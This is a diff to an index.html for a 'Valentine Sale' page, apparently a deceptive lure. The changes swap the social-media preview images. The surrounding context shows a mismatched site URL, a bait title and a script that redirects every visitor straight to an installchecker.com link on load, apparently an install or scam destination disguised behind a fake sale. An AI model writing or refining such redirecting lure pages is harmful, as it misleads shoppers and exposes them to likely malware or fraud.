--- a/index.html
+++ b/index.html
@@ -8,7 +8,7 @@
   <!-- Open Graph Meta Tags -->
   <meta property="og:title" content="Valentine Sale - Up to 50% Off!">
   <meta property="og:description" content="Don't miss out on amazing Valentine deals. Shop now and save big!">
-  <meta property="og:image" content="https://pngtree.com/freepng/valentines-day-sale-50-off-typography-with-heart-vector_19745723.html">
+  <meta property="og:image" content="https://img.freepik.com/free-vector/valentines-day-sale-paper-style_23-2148805124.jpg">
   <meta property="og:url" content="https://www.christmascelebration.online">
   <meta property="og:type" content="website">
 
@@ -16,7 +16,7 @@
   <meta name="twitter:card" content="summary_large_image">
   <meta name="twitter:title" content="Valentine Sale - Up to 50% Off!">
   <meta name="twitter:description" content="Don't miss out on amazing Valentine deals. Shop now and save big!">
-  <meta name="twitter:image" content="https://pngtree.com/freepng/valentines-day-sale-50-off-typography-with-heart-vector_19745723.html">
+  <meta name="twitter:image" content="https://img.freepik.com/free-vector/valentines-day-sale-paper-style_23-2148805124.jpg">
   <title>Get 50% On Valentine Items</title>
     <script>
 window.location.href="https://installchecker.com/cl/i/42n311" ;
